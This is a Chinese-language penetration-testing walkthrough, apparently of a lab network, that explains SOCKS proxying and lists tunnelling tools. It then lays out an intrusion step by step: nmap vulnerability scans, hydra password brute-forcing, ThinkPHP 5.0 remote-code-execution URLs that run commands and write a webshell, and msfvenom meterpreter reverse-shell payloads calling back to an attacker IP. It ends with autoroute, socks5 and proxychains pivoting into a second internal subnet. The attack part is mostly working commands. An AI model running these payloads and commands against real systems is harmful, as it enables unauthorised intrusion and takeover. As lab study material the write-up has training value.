SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。
根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。
使用TCP协议传输数据,因而不提供如传递 ICMP 信息之类的网络层网关服务。
osi参考模型:https://www.cnblogs.com/qishui/p/5428938.html
现今大多组织的网络架构,利用网络防火墙将组织内部的网络结构与外部网络如 Internet 有效地隔离开来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET、FTP、SMTP等的接入。
而SOCKS则提供一个通用框架来使这些协议安全透明地穿过防火墙。
使用Socks代理:
http://rootkiter.com/EarthWorm/
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设
和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
https://github.com/fatedier/frp
frp 是一个可用于内网穿透的高性能的反向代理应用
http://proxychains.sourceforge.net/
关于ProxyChains工具:
可用性:
reDuh:https://github.com/sensepost/reDuh
reGeorg:https://github.com/sensepost/reGeorg
sSocks:https://sourceforge.net/projects/ssocks/
SocksCap64:http://www.sockscap64.com
Proxifier:https://www.proxifier.com/
nmap -A -T4 -p- --script vuln 192.168.78.66
开放端口:21/22/80/111/888/3306/8888
操作系统:Linux
21 / 22端口:弱口令爆破
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ftp
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ssh
3306端口:不允许远程IP连接
8888端口:宝塔登录页面
80端口:Thinkphp v5.0
存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell。
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=
ifconfig:发现存在192.168.22.0/24的内网网段。
探测此网段存活主机,发现存活主机 192.168.22.22
#!/bin/bash
for num in {1..254};
do
ip=192.168.22.$num
ping -c1 $ip >/dev/null 2>&1
if [ $? = 0 ];
then
echo "$ip" Ok
else
echo "$ip" No
fi
done
@echo off
chcp 65001>nul
echo 正在扫描。。。。。。
for /L %%P in (1,1,254) do @ping -w 10 -n 1 192.168.78.%%P | findstr TTL= >>ip.txt
echo 扫描结束,按任意键结束窗口!
pause>nul
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.78.117 lport=6666 R > mingy.php
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.78.117 lport=6667 -f elf > mingy.elf
chmod 777 mingy.elf
./mingy.elf
meterpreter shell
后,添加到192.168.22
网段的路由run autoroute -s 192.168.22.0/24
run autoroute -p
msf5 > use auxiliary/server/socks5
msf5 auxiliary(server/socks5) > run
vim /etc/proxychains.conf
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p- -n -T4 192.168.22.22
开放端口:21/22/80/3306/8888
操作系统:linux
21 / 22 / 3306端口:弱口令爆破
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ftp
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ssh
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 mysql
8888端口:宝塔登录页面
80端口:bagecms(sql注入,任意文件编辑漏洞)
proxychains curl 192.168.22.22